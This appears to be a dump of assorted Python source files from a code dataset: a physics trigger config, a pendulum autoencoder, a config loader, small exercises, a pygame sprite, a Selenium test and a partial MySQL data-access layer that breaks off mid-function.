+{"seq_id":"346925460","text":"### @file\n#\n# Standard Di-electron\n#\n# @author P. Koppenburg Patrick.Koppenburg@cern.ch\n# @date 2008-07-15\n#\n##\n#OBSOLETE: REDIRECT TO TRACK FITTED ELECTRONS FOR NOW\n#SHOULD BE REMOVED ENTIRELY\nfrom Hlt2SharedParticles.TrackFittedDiElectron import TrackFittedDiElectron, TrackFittedDiElectronFromL0\n__all__ = ('DiElectron', 'DiElectronFromL0')\nDiElectron = TrackFittedDiElectron\nDiElectronFromL0 = TrackFittedDiElectronFromL0\n'''\nfrom Gaudi.Configuration import *\nfrom Configurables import CombineParticles\nfrom Hlt2SharedParticles.BasicParticles import Electrons\nfrom HltLine.HltLine import bindMembers, Hlt2Member\n\n__all__ = ( 'DiElectron' )\n\nHlt2SharedDiElectron = Hlt2Member( CombineParticles\n , \"DiElectron\"\n , Inputs = [ Electrons ]\n , DecayDescriptor = \"J/psi(1S) -> e+ e-\" \n , DaughtersCuts = {\"e+\" : \"(PT>300*MeV)\"}\n , CombinationCut = \"AALL\"\n , MotherCut = \"(VFASPF(VCHI2PDOF)<100)\"\n , WriteP2PVRelations = False\n )\n\nDiElectron = bindMembers( \"Shared\", [ Electrons, Hlt2SharedDiElectron ] )\n'''\n","sub_path":"Hlt/Hlt/Hlt2SharedParticles/python/Hlt2SharedParticles/DiElectron.py","file_name":"DiElectron.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"606855781","text":"import random as rd;import numpy as np;import sys;import pickle\nimport torch\nimport torch.nn as nn\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport math\n#-------------------------------------------------------------------------------\ndef DampedPend(b,k,t,m):\n    if t==0:\n        position=1\n    else:\n        dump=math.exp(-(b/(2*m))*t) # damping envelope exp(-b*t/(2m))\n        omega=np.sqrt(k/m)*np.sqrt(1-(b**2)/(4*m*k))\n        osc=np.cos(omega*t)\n        position = dump*osc\n    return position\n#-------------------------------------------------------------------------------\n    # GENERATE THE DATASET BY SAMPLING K AND B FROM THEIR SPECIFIC RANGES\ndef Box_1_dataset_with_Constants(n_batch,batch_size,exemplos_por_batch):\n    inp=[]; question=[]; m=1\n    T=[i for i in range(0,50)]\n    K=np.linspace(5, 11, num=50)\n    B=np.linspace(0.5, 1.1, num=50)\n    KK=[]; BB=[]\n#    K=np.linspace(5, 11, num=100) #those are default values\n#    B=np.linspace(0.5,1.1, num=100) #those are default values\n#''' THIS IS FOR A RANDOM CONFIG OF K AND B'''\n    for i in range(n_batch):\n        t=[]; position=[]; full=0\n        while full!=batch_size:\n            ki=rd.randint(0,49); bi=rd.randint(0,49)\n            k=K[ki]; b=B[bi]\n            KK.append(k); BB.append(b)\n            y=[]; tpred=[]\n            for l in T:\n                yy=DampedPend(b,k,l,m)\n                y.append(yy)\n                tpred.append(l)\n            plt.clf() #uncomment to graph\n            plt.xlim([0, 12]) #uncomment to graph\n            plt.ylim([-1, 1]) #uncomment to graph\n            plt.plot(tpred,y) #uncomment to graph\n            plt.pause(0.5) #uncomment to graph\n\n            t.append(tpred)\n            position.append(y)\n            full+=1\n        inp.append(position)\n        question.append(t)\n    KK=np.array(KK).reshape(n_batch,batch_size,1) # To work on scynet\n    BB=np.array(BB).reshape(n_batch,batch_size,1) # To work on scynet\n    Constantes=[KK,BB]\n    inp=torch.as_tensor(inp)\n    question=torch.as_tensor(question)\n    plt.show()\n    print('shape(question) =',np.shape(question))\n    print('Constantes =',np.shape(Constantes))\n    sys.exit() # debugging stop: the pickle dumps below never run while this is here\n    address = open(\"positions\",\"wb\")\n    pickle.dump(inp, address)\n    address.close()\n    address = open(\"question\",\"wb\")\n    pickle.dump(question, address)\n    address.close()\n    address = open(\"Constantes\",\"wb\")\n    pickle.dump(Constantes, address)\n    address.close()\n#Box_1_dataset_with_Constants(5,1000,50)\n#sys.exit()\n#-----------------------------------------------------------------------\n#------------------LOAD DATA-----------------------------------------------------\n#-----------------------------------------------------------------------\ninp = pickle.load( open( \"positions\", \"rb\" ) )\nquestion= pickle.load( open( \"question\", \"rb\" ) )\nout = pickle.load( open( \"positions\", \"rb\" ) )\nConstantes = pickle.load( open( \"Constantes\", \"rb\" ) )\nK=Constantes[0];B=Constantes[1]\nn_batch=np.shape(inp)[0]\nbatch_size=np.shape(inp)[1]\nn_examples=np.shape(inp)[2]\n#-----------------------------------------------------------------------\n#plt.plot(question[0][0].detach().numpy(),out[0][0].detach().numpy())\n#plt.show();sys.exit()\n#-------------------------------------------------------------------------------\n#------------------DEFINE THE MODEL----------------------------------------------\n#-------------------------------------------------------------------------------\nclass Autoencoder(nn.Module):\n    def __init__(self):\n        # N, 50\n        super().__init__()\n        self.encoder = nn.Sequential(\n            nn.Linear(50,400),\n            nn.Tanh(),\n            nn.Linear(400,300),\n            nn.Tanh(),\n            nn.Linear(300,200),\n            nn.Tanh(),\n            nn.Linear(200,3),\n            nn.Tanh(),\n        )\n        self.project=nn.Linear(1,3)\n        self.decoder=nn.Sequential(\n            nn.Linear(6,100),\n            nn.Tanh(),\n            nn.Linear(100,200),\n            nn.Tanh(),\n            nn.Linear(200,450),\n            nn.Tanh(),\n            nn.Linear(450,50),\n            nn.Tanh(),\n            nn.Linear(50,1),\n        )\n    def forward(self, x, t):\n        encoded = self.encoder(x)\n        t=self.project(t)\n        aux=torch.cat((encoded,t),1)\n        decoded = self.decoder(aux)\n        return decoded,encoded\n#-------------------------------------------------------------------------------\n#------------------INITIALISE LAYER WEIGHTS ORTHOGONALLY------------------------\n#-------------------------------------------------------------------------------\nmodel = Autoencoder()\nfor m in model.modules():\n    if isinstance(m, (nn.Conv2d, nn.Linear)):\n        nn.init.orthogonal_(m.weight)\ncriterion = nn.MSELoss() #still to investigate\noptimizer = torch.optim.Adam(model.parameters())#,lr=1e-4,weight_decay = 1e-5)\n#optimizer = torch.optim.SGD(model.parameters(),lr=1e-4,weight_decay = 1e-5)#,momentum=0.5)\n#-------------------------------------------------------------------------------\n#---------------------TRAINING--------------------------------------------------\n#-------------------------------------------------------------------------------\ndef treine(epochs):\n    inp = pickle.load( open( \"positions\", \"rb\" ) )\n    question= pickle.load( open( \"question\", \"rb\" ) )\n    out = pickle.load( open( \"positions\", \"rb\" ) )\n    n_batch=np.shape(inp)[0]\n    batch_size=np.shape(inp)[1]\n    n_examples=np.shape(inp)[2]\n    T=question[0,0]\n    t=torch.as_tensor(np.zeros((batch_size,1)))\n    answ=torch.as_tensor(np.zeros((batch_size,1)))\n    indicedografico=0\n    for epoch in range(epochs):\n        for batch_idx in range(n_batch):\n            inputs = inp[batch_idx]\n            inputs=inputs.float()\n            t=t.float()\n            out=out.float()\n            r=rd.randint(0,49)\n            for i in range(batch_size):\n                r=rd.randint(0,49)\n                t[i][0]=question[batch_idx,i,r]\n                answ[i][0]=inp[batch_idx,i,r]\n            recon,latent = model(inputs,t)\n            loss=torch.mean((recon-answ)**2)\n            optimizer.zero_grad()\n            loss.backward()\n            optimizer.step()\n        print(f'Epoch:{epoch+1},Loss:{loss.item():.4f}')\n#treine(10000)\n#-------------------------------------------------------------------------------\n#---------------------SAVE AND LOAD STATE---------------------------------------\n#-------------------------------------------------------------------------------\nPATH='Box1_state.pt' # this one was trained for 10k epochs,\n                     #3 latent and 6 project of dataset(5,500,50)\n#PATH='Box1_state.pt'\nmodel=Autoencoder()\n#torch.save(state, filepath)\nmodel.load_state_dict(torch.load(PATH))\n#-------------------------------------------------------------------------------\n#---------------------PLOTS-----------------------------------------------------\n#-------------------------------------------------------------------------------\ndef Predict_test_Scynet():\n    t=torch.as_tensor(np.zeros((batch_size,1)))\n    t=t.float()\n    Y=np.zeros(50); T=[i for i in range(0,50)]\n    for aux in range(0,n_batch):\n        for rdn_batch in range(0,batch_size):\n            YY=inp[aux][rdn_batch].detach().numpy()\n            r=0\n            for interval in range(0,49):\n                for i in range(batch_size):\n                    t[i][0]=question[0,i,r]\n                y,latent=model(inp[aux].float(),t)\n                y=y.detach().numpy()[rdn_batch]\n                Y[interval]=y\n                r+=1\n            plt.clf()\n            plt.xlim([0, 50])\n            plt.ylim([-1, 1])\n            plt.plot(T,Y,label='predict',ls='dashed')\n            plt.plot(T,YY,label='equation')\n            #plt.scatter(T, Y,c='black',label='recon')\n            #plt.scatter(T, YY,c='red',label='answ')\n            plt.legend()\n            plt.pause(0.03)\n            #plt.close()\n    plt.show()\nPredict_test_Scynet()\n#-------------------------------------------------------------------------------\ndef Latent_values_Scynet1():\n    fig = make_subplots(rows=1, cols=3,\n                    specs=[[{'is_3d': True}, {'is_3d': True}, {'is_3d': True}]],\n                    subplot_titles=['Latent Activation 1', 'Latent Activation 2', 'Latent Activation 3'],\n                    )\n    t=torch.as_tensor(np.zeros((batch_size,1)))\n    t=t.float()\n    L1,L2,L3=np.zeros(batch_size),np.zeros(batch_size),np.zeros(batch_size)\n    ks,bs=np.zeros(batch_size),np.zeros(batch_size)\n    Y=np.zeros(50); T=[i for i in range(0,50)]\n    r=10 # time step used as the question put to the neural network\n    for i in range(batch_size):\n        t[i][0]=question[0,i,r]\n    for aux in range(0,1):#n_batch):\n        for rdn_batch in range(0,batch_size):\n            y,latent=model(inp[aux].float(),t)\n            L1[rdn_batch] = latent[rdn_batch][0].detach().numpy()\n            L2[rdn_batch] = latent[rdn_batch][1].detach().numpy()\n            L3[rdn_batch] = latent[rdn_batch][2].detach().numpy()\n            ks[rdn_batch] = K[aux][rdn_batch]\n            bs[rdn_batch] = B[aux][rdn_batch]\n    fig.add_trace(go.Scatter3d(x=bs,y=ks,z=L1,mode='markers',marker=dict(\n        size=12,color=L1,colorscale='Viridis',opacity=0.8)), 1, 1)\n    fig.add_trace(go.Scatter3d(x=bs,y=ks,z=L2,mode='markers',marker=dict(\n        size=12,color=L2,colorscale='Viridis',opacity=0.8)), 1, 2)\n    fig.add_trace(go.Scatter3d(x=bs,y=ks,z=L3,mode='markers',marker=dict(\n        size=12,color=L3,colorscale='Viridis',opacity=0.8)), 1, 3)\n    fig.show()\n#Latent_values_Scynet1()\n#--------------------------------------------------------------------------\ndef Latent_values_Scynet2():\n    fig = plt.figure(figsize=plt.figaspect(0.5))\n    ax1 = fig.add_subplot(1, 3, 1, projection='3d')\n    ax2 = fig.add_subplot(1, 3, 2, projection='3d')\n    ax3 = fig.add_subplot(1, 3, 3, projection='3d')\n    t=torch.as_tensor(np.zeros((batch_size,1)))\n    t=t.float()\n    L1,L2,L3=np.zeros(batch_size),np.zeros(batch_size),np.zeros(batch_size)\n    Y=np.zeros(50); T=[i for i in range(0,50)]\n    r=25\n    for i in range(batch_size):\n        t[i][0]=question[0,i,r]\n    #rdn_batch=rd.randint(0,batch_size)\n    #aux=[i for i in range(0,n_batch)]\n    for aux in range(0,n_batch):\n        for rdn_batch in range(0,batch_size):\n            #YY=inp[aux][rdn_batch].detach().numpy()\n            y,latent=model(inp[aux].float(),t)\n            #y=y.detach().numpy()[rdn_batch]\n            #Y[interval]=y\n            L1[rdn_batch] = latent[rdn_batch][0].detach().numpy()\n            L2[rdn_batch] = latent[rdn_batch][1].detach().numpy()\n            L3[rdn_batch] = latent[rdn_batch][2].detach().numpy()\n            um = latent[rdn_batch][0].detach().numpy()#.reshape(500)\n            #um = latent[rdn_batch][0].detach().numpy()#.reshape(500)\n            dois = latent[rdn_batch][1].detach().numpy()#.reshape(500)\n            #dois = latent[rdn_batch][1].detach().numpy()#.reshape(500)\n            tres = latent[rdn_batch][2].detach().numpy()#.reshape(500)\n            #tres = latent[rdn_batch][2].detach().numpy()#.reshape(500)\n            um=np.array(um)\n            dois=np.array(dois)\n            tres=np.array(tres)\n            k=np.array(K[aux][rdn_batch])\n            b=np.array(B[aux][rdn_batch])\n            #print(np.shape(B))\n            #print(np.shape(K))\n            #print(np.shape(L1))\n            #print(um)\n            #sys.exit()\n            surf=ax1.scatter3D(k, b, L1,label='Latent Activation 1' )\n            surf=ax2.scatter3D(k, b, L2,label='Latent Activation 2' )\n            surf=ax3.scatter3D(k, b, L3,label='Latent Activation 3' )\n    plt.show()\n#Latent_values_Scynet2()\n","sub_path":"Box1.py","file_name":"Box1.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"98370311","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCONFIG\n------\nA thin wrapper around the application configuration\n\"\"\"\nimport os\nfrom configparser import ConfigParser\nCONF_PATH = os.path.join(os.path.dirname(os.getcwd()), \"conf/config.conf\")\n# print(CONF_PATH, \"姜振康\")\n# DICT_PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.dirname(os.getcwd())), \"nlp_learn/data/ner_data/\"))\n# print(DICT_PATH)\n__config = None\n\n\ndef get_config(config_file_path=CONF_PATH):\n    \"\"\"\n    Singleton-style accessor: parse the config file once, then reuse it\n    \"\"\"\n    global __config\n    if not __config:\n        config = ConfigParser()\n        config.read(config_file_path)\n        __config = config  # cache the parsed config so later calls reuse it\n    else:\n        config = __config\n    return config\n","sub_path":"flast_practice/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
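A quick usage sketch for the accessor above; the section and option names are invented for illustration:

config = get_config()
# ConfigParser lookups take a section name and an option name
host = config.get("database", "host")
port = config.getint("database", "port")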
+{"seq_id":"219460995","text":"books = [\"ULYSSES\",\"ANIMAL FARM\",\"BRAVE NEW WORLD\",\"ENDER'S GAME\"]\nbook_dict = {}\nfor title in books:\n    print(title)\n    total_chars = len(title)        # total characters in the title\n    unique_chars = len(set(title))  # set() drops duplicate characters\n    print(total_chars)\n    print(unique_chars)\n    average = (total_chars + unique_chars) / 2\n    # map each title to (total characters, unique characters, their average)\n    book_dict[title] = (total_chars, unique_chars, average)\nprint(book_dict)\n","sub_path":"lab7/ex2-3.py","file_name":"ex2-3.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"397501482","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Ship(Sprite):\n def __init__(self, settings, surface):\n \"\"\"Initialize the ship and set its starting position.\"\"\"\n\n super(Ship, self).__init__()\n self.surface = surface\n self.settings = settings\n\n # Load the ship image and get its rect.\n self.image = pygame.image.load(\"images/ship.bmp\")\n self.rect = self.image.get_rect()\n self.surfaceRect = surface.get_rect()\n\n # Start each new ship at the bottom center of the surface.\n self.rect.centerx = self.surfaceRect.centerx\n self.rect.bottom = self.surfaceRect.bottom\n\n # Store a decimal value for the ship's center.\n self.center = float(self.rect.centerx)\n\n # Movement flag\n self.movingRight = False\n self.movingLeft = False\n\n def update(self):\n \"\"\"Update the ship's position based on movement flags.\"\"\"\n\n # Update the ship'scenter value, not the rect.\n if self.movingRight and self.rect.right < self.surfaceRect.right:\n self.center += self.settings.shipSpeedFactor\n if self.movingLeft and self.rect.left > 0:\n self.center -= self.settings.shipSpeedFactor\n\n # Update rect object from self.center.\n self.rect.centerx = self.center\n\n def blit(self):\n \"\"\"Draw the ship at its current location.\"\"\"\n\n self.surface.blit(self.image, self.rect)\n\n def centerShip(self):\n \"\"\"Center the ship on the screen.\"\"\"\n\n self.center = self.surfaceRect.centerx","sub_path":"AlienInvasion/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"353218474","text":"def fp(n):\n\t\"\"\"Count the ways to make n pence from the standard UK coins.\n\n\tFirst finds the number of ways using only 1 pence coins, then adds\n\tthe ways made possible once a 2 pence coin is introduced, and so on.\n\t\"\"\"\n\tvalues = [1, 2, 5, 10, 20, 50, 100, 200]\n\n\tpossibilities = [0] * (n + 1)\n\tpossibilities[0] = 1\n\n\tfor val in values:\n\t\tfor i in range(val, n + 1):\n\t\t\tpossibilities[i] += possibilities[i - val]\n\treturn possibilities[n]","sub_path":"Problems 31 - 40/problem 31/problem31.py","file_name":"problem31.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
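For the classic Project Euler 31 input, two pounds made from the eight standard UK coins, this bottom-up count gives:

print(fp(200))  # 73682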
+{"seq_id":"368367057","text":"from selenium import webdriver\nimport unittest\nimport time\nclass Baidu1(unittest.TestCase):\n    def setUp(self):\n        self.driver=webdriver.Chrome()\n        self.base_url=\"http://www.baidu.com\"\n        self.driver.maximize_window()\n        self.errors=[]\n        self.accept_next_alert=True\n    def tearDown(self):\n        self.driver.quit()\n        self.assertEqual([],self.errors)\n    # @unittest.skip(\"skipping\")\n    def test_search(self):\n        self.driver.get(self.base_url)\n        self.driver.implicitly_wait(5)\n        self.driver.find_element_by_id(\"kw\").send_keys(\"高校开学\")\n        self.driver.find_element_by_id(\"su\").click()\n        time.sleep(5)\n    def test_hao(self):\n        self.driver.get(self.base_url)\n        self.driver.find_element_by_link_text(\"hao123\").click()\n        time.sleep(6)\n\n# must sit at module level, outside the TestCase class body, or the runner never starts\nif __name__=='__main__':\n    unittest.main(verbosity=2)","sub_path":"2020-4-14-selenium/src0416/text1.py","file_name":"text1.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"266502593","text":"\"\"\"\nevoke MySQL database interface: \n\n(Christopher J Hurst 2003 onwards) \n(modified Ian Howie Mackenzie Nov 2005 onwards)\n\"\"\"\n\nfrom .schema import *\nfrom evoke.lib import Permit\nfrom time import time\nfrom pickle import loads, dumps\n\n\nclass DataObject(object):\n \"Basic Model of a Persistent Data Object\"\n __implements__ = 'DataObjectInterface' # apart from the class methods\n\n def __init__(self, fields):\n \"fields - [track changes for these names]\"\n self._v_changed = {}\n self._v_fields = fields\n\n def __setattr__(self, name, value):\n \"keep track of changed atts\"\n object.__setattr__(self, name, value)\n if '_v_' not in name and name in self._v_fields:\n self._v_changed[name] = True\n\n def __delattr__(self, name):\n \"keep track of changed atts\"\n object.__delattr__(self, name)\n if name in self._v_changed:\n del self._v_changed[name]\n\n def update(self, args):\n \"Update Object Fields\"\n x = [\n setattr(self, k, v) for k, v in list(args.items())\n if k in self._v_fields\n ]\n\n def flush(self, only=[]):\n \"return dictionary of changes, then reset self._v_changed\"\n #print \"flush2\"\n res = {}\n changed = self._v_changed\n # filter by only if present\n if only:\n # print \">>>>>>>>>>>>>> flushing only \",only\n keys = [i for i in list(changed.keys()) if i in only]\n d = {}\n for k in keys:\n d[k] = changed[k]\n changed = d\n # set object atts\n for i in changed:\n res[i] = getattr(self, i)\n self._v_changed = {}\n return res\n\n\nclass SQLDataObject(DataObject):\n \"MySQL backed persistence\"\n _v_schema = {}\n _v_fields = []\n\n # Initialisation\n def __init__(self):\n self._v_changed = {}\n\n def __setattr__(self, name, value):\n \"for object attributes, create a new instance with the new value, thus converting it as required\"\n if name in self._v_schema:\n # print \"CLASS\",self._v_schema[name].__name__\n # print \"SET====\",name,value\n value = self._v_schema[name](\n value\n ) #create an instance of the relevant type, thus processing value where required\n# print \" TO:\",value\n DataObject.__setattr__(self, name, value)\n\n def __getattribute__(self, name):\n \"\"\n value = object.__getattribute__(self, name)\n if value and isinstance(value, REL):\n value = self.__class__.__dict__[name.capitalize()].get(value)\n object.__setattr__(\n self, name, value\n ) #bypass DataObject here, as we are not changing anything\n return value\n\n def sql(self):\n \"for use by REL attributes that have been substituted (by __getattribute__ above) with evoke objects (which have RemoteDataObject as a mix-in)\"\n return self.uid\n\n def flush(self, only=[]):\n \"save changes to db, filtered by only\"\n changes = DataObject.flush(self, only=only)\n if not changes:\n return\n# print \">>>> changes >>>>>\",changes.items(),\n# for (k,v) in changes.items():\n# print \">>>> change >>>>>\",k,v,type(v),repr(v),str(v)\n#fields = self.quoted_pairs(changes.items())\n# fix order of changes dict by converting to a list of tuples\n\n# handle REL objects\n for k in changes:\n if isinstance(changes[k], REL):\n changes[k] = int(changes[k])\n if hasattr(changes[k], 'uid'):\n changes[k] = changes[k].uid\n # and DATE objects\n if isinstance(changes[k], DATE):\n changes[k] = changes[k].sql(quoted=False)\n\n items = list(changes.items())\n\n fields = ', '.join((\"`%s`=%%s\" % k) for k, v in items)\n # list of fields ready for MySQLdb parameters.\n # self.uid always last in the list\n values = tuple([v for k, v in items] + [self.uid])\n\n sql = \"update %s set 
%s where uid=%%s\" % (self.table, fields)\n # print \">>>> SQL >>>>>\",r\"%s\" % sql\n #print sql\n execute(sql, values)\n\n def quoted_pairs(self, items, op='='):\n \"quote key,value pairs according to _v_schema \"\n fields = []\n for k, v in items:\n if not isinstance(v, (Schema, DataObject)):\n v = self._v_schema[k](v)\n fields.append(\"`%s` %s %s\" % (k, op, v.sql()))\n return \", \".join(fields)\n\n @classmethod\n def sql_quoted_pairs(self, items, op='=', link=', '):\n \"return sql and list of args suitable for mySQLdb arg substitution\"\n fields = []\n sqlargs = []\n for k, v in items:\n if not isinstance(v, (Schema, DataObject)):\n v = self._v_schema[k](v)\n fields.append(\"`%s` %s %%s\" % (k, op))\n sqlargs.append(v.sql(quoted=False))\n sql = (\" %s \" % link).join(fields)\n return sql, sqlargs\n\n\n# Error Classes for MassProducedSQLDataObject\nclass RecordNotFoundError(Error):\n \"%s with uid=%d not found\"\n\n\nclass RecordInUseError(Error):\n \"%s with uid=%d is still in use\"\n\n\nclass ListParameterConflictError(Error):\n \"You shouldn't call list with a non-default what parameter when asObjects is true.\"\n\n\nclass SQLArgumentMismatchError(Error):\n \"Number of arguments does not match number required by SQL statement.\"\n\n\nclass InvalidOrderFieldError(Error):\n \"Field in ORDER BY clause not found for this object.\"\n\n\nclass InvalidOrderDirectionError(Error):\n \"Direction in ORDER BY clause not valid.\"\n\n\nclass Subscriptable(type):\n \"\"\"metaclass to allow a class to be subscripted\"\"\"\n\n def __getitem__(cls, x):\n return cls.get(x)\n\n\nclass MassProducedSQLDataObject(SQLDataObject, metaclass=Subscriptable):\n \"SQL data object for use with makeDataClass\"\n\n @classmethod\n def ns_table(cls):\n \"\"\n db, tbl = cls.table.replace('`', '').split('.', 1)\n if hasattr(cls, 'ns'):\n s = '`%s`.`%s`' % (db + '_' + cls.ns, tbl)\n #print 'ns=', s\n else:\n s = cls.table\n return s\n\n @classmethod\n def exists(cls, uid):\n \"return true if a record with this uid exists\"\n sql = 'select * from %s where uid=%%s' % (cls.table, )\n _data = execute(sql, (uid, ))\n return len(_data) > 0\n\n def get(cls, uid, data={}):\n \"get database record and return it as an object\"\n if not data:\n # send uid as a proper MySQLdb parameter\n sql = 'select * from %s where uid=%%s' % (cls.table, )\n _data = execute(sql, (uid, ))\n if not _data:\n raise RecordNotFoundError(cls.table, uid)\n data = _data[0]\n ob = cls()\n #create the instance attributes\n # ob.update(data)\n for k, v in list(data.items()\n ): # as per update(data) but allow extra data fields\n setattr(ob, k, v)\n # clear the change queue, so the defaults are not needlessly updated\n ob._v_changed = {}\n\n # call __init__\n if hasattr(cls.__bases__[0], '__init__'):\n cls.__bases__[0].__init__(ob)\n\n return ob\n\n __getitem__ = classmethod(get) #### works for instance, but not class :s\n get = classmethod(get)\n # allow for get overrides\n __get__ = get\n\n @classmethod\n def tryget(cls, uid):\n \"a bombproof get()\"\n try:\n return get(cls, uid)\n except:\n return None\n\n @classmethod\n def new(cls):\n \"create a new database record and return it as a an object\"\n id = execute('insert into %s() values()' % cls.table)\n return cls.get(id)\n\n def delete(self, uid=0):\n \"remove self (or the database record with given uid: uid is for retro compat.)\"\n sql = 'delete from %s where uid=%%s' % (self.table, )\n execute(sql, (uid or self.uid, ))\n\n def clone(self):\n \"create a clone of self, flush it, and return it\"\n ob = 
self.new()\n for k in (i for i in self._v_fields if i != 'uid'):\n setattr(ob, k, getattr(self, k))\n ob.flush()\n return ob\n\n def all_change(self):\n \"mark all fields as changed where their value is not None\"\n changed = dict((i, True) for i in self._v_fields\n if getattr(self, i) is not None)\n self._v_changed.update(changed)\n\n def pickle(self):\n \"return pickled representation of the object's fields\"\n return dumps(dict((k, getattr(self, k)) for k in self._v_fields))\n\n def pickle_update(self, pkl):\n \"update object with pickled dict\"\n d = loads(pkl)\n self.update(d)\n\n #### Test Purposes\n @classmethod\n def X_list(self, *a, **k):\n \"Testing purposes - run old and new variations, compare results and time taken\"\n k['_debug'] = 1\n # old version\n oldstart = time()\n oldres = self.old_list(*a, **k)\n oldtime = time() - oldstart\n\n # new version\n newstart = time()\n newres = self.old_list(*a, **k)\n newtime = time() - newstart\n\n #print \"LIST: old=%d / %.4f new=%d / %.4f\" % (len(oldres), oldtime, len(newres), newtime)\n #assert oldres==newres, \"Old and new list give different results\"\n return newres\n\n @classmethod\n @Permit('no way')\n def old_list(cls,\n asObjects=True,\n sql='',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n pager=-1,\n pagelength=20,\n what='*',\n _debug=False,\n **criteria):\n \"\"\"return list of objects (if obs) or data filtered by these criteria\n sql with asObjects=True requires 'select *' to give fully valid objects, so 'what' should not be used with asObjects=False \n \"\"\"\n ob = cls() # we need an instance of our class for quoted_pairs\n # sql overrides all other parameters\n if not sql:\n pairs = ob.quoted_pairs(list(criteria.items())).replace(\n ',', ' and ')\n likes = ob.quoted_pairs(\n list(like.items()), op='like').replace(',', ' and ')\n orderby = orderby and 'order by %s' % orderby or ''\n limit = limit and 'limit %s' % limit or ''\n # page overrides limit\n if pager != -1:\n start = int(pager) * int(pagelength)\n limit = 'limit %d,%d' % (start, int(pagelength))\n\n # for in clauses we wildly assume that this will be passed a list of strings or ints...\n ins = ' and '.join('`%s` in %s' % (k, sql_list(v))\n for k, v in list(isin.items()))\n sql = \"select %s from %s %s %s %s %s\" % (\n what, cls.table,\n (pairs or likes or ins or where) and 'where' or '',\n ' and '.join(i for i in (pairs, likes, ins, where)\n if i), orderby, limit)\n if _debug:\n #print \"LIST:\", sql\n pass\n data = execute(sql)\n if asObjects:\n data = [cls.get(i['uid'], data=i) for i in data]\n del ob, cls\n return data\n\n #list.permit='no way' # disable direct web access\n #list=classmethod(list)\n\n @classmethod\n @Permit('no way')\n def list(cls,\n asObjects=True,\n sql='',\n sqlargs=(),\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n pager=-1,\n pagelength=20,\n what='*',\n _debug=False,\n **criteria):\n \"\"\"return list of objects (if obs) or data filtered by these criteria\n sql with asObjects=True requires 'select *' to give fully valid objects, so 'what' should not be used with asObjects=False \n \n Parameters:\n cls = class of current object\n asObjects \n = False: return a list of dictionaries \n = True: return list of objects of the current class\n sql = full sql query. 
Parameters to be sent as tuple via sqlargs \n sqlargs = tuple containing values to substitute into sql/where parameters.\n like = dict of form {fieldname:matchpattern}\n maps to sql 'fieldname LIKE \"matchpattern\" and otherfieldname LIKE \"othermatchpattern\"'\n isin = dict of form {fieldname:list-of-values}\n orderby = sql ORDER BY clause\n where = sql WHERE clause. Parameters to be sent as tuple via sqlargs \n limit = sql LIMIT clause\n pager = Start page of results divided by page length. Overrides limit parameter\n pageLength = length of pages - use in combination with pager parameter\n what = fields to be returned by query DEPRECATED CJH 20130408\n we can't use sql args with field names so this is in practise a minute risk..\n _debug = if True print prepared sql statement \n **criteria = remaining field value pairs map to WHERE statement assersions which must all be true\n\n eg. self.list(x=5,y='something') -> 'WHERE x=5 and y=\"something\"'\n \"\"\"\n # make sure we don't combine non-default 'what' with asObjects=True\n if asObjects and what != '*':\n raise ListParameterConflictError\n\n # # `what` parameter DEPRECATED CJH 20130408 ( WHY? IHM 20141111)\n # if what !='*':\n # print \"DEPRECATED: evoke.data.list `what` parameter is deprecated\"\n\n # sql overrides all other parameters except sqlargs\n if sql:\n # no further action required\n pass\n else:\n # build up sql from criteria\n if where:\n sqlparts = [where]\n sqlargs = list(sqlargs)\n else:\n sqlparts = []\n sqlargs = []\n\n # criteria\n if criteria:\n # print\">>>>>> criteria items >>>>>\"\n # for k,v in criteria.items():\n # print k,v\n criteria_sql, criteria_args = cls.sql_quoted_pairs(\n list(criteria.items()), link='and')\n sqlparts.append(criteria_sql)\n sqlargs += criteria_args\n\n # like\n if like:\n like_sql, like_args = cls.sql_quoted_pairs(\n list(like.items()), op='like', link='and')\n like_sql = like_sql.replace(\"%\", \"%%\").replace(\n '%%s', '%s') # double the % wildcard (but not any %s)\n sqlparts.append(like_sql)\n sqlargs += like_args\n\n # isin\n for isin_field, isin_values in list(isin.items()):\n if not isin_values:\n continue\n isin_sql = ' %s in (%s)' % (\n isin_field, ', '.join(['%s'] * len(isin_values)))\n isin_args = list(isin_values)\n sqlparts.append(isin_sql)\n sqlargs += isin_args\n\n # orderby - as field names can't be used in mySQLdb argument\n # substitution we make sure this only includes field names\n # optionally quoted with ``, separated by commas and optionally\n # including desc.\n orderby = cls.parse_orderby(orderby)\n if orderby:\n orderby = \" ORDER BY %s\" % orderby\n\n # limit and paging\n if pager == -1:\n limit = limit and 'LIMIT %s' % limit or ''\n else:\n start = int(pager) * int(pagelength)\n limit = 'LIMIT %d,%d' % (start, int(pagelength))\n\n # We should have a complete query. Convert args into a tuple\n # and test we have the right number of substitutions\n where = sqlparts and 'where' or ''\n whereclauses = (' and '.join(sqlparts)).replace(\"%\", \"%%\").replace(\n '%%s', '%s') # double the % wildcard (but not any %s)\n sql = 'select %s from %s %s %s %s %s' % (what, cls.ns_table(),\n where, whereclauses,\n orderby, limit)\n sqlargs = tuple(sqlargs)\n try:\n nowt = sql % sqlargs\n #except TypeError:\n except:\n print(\"data.list unmatched arguments. 
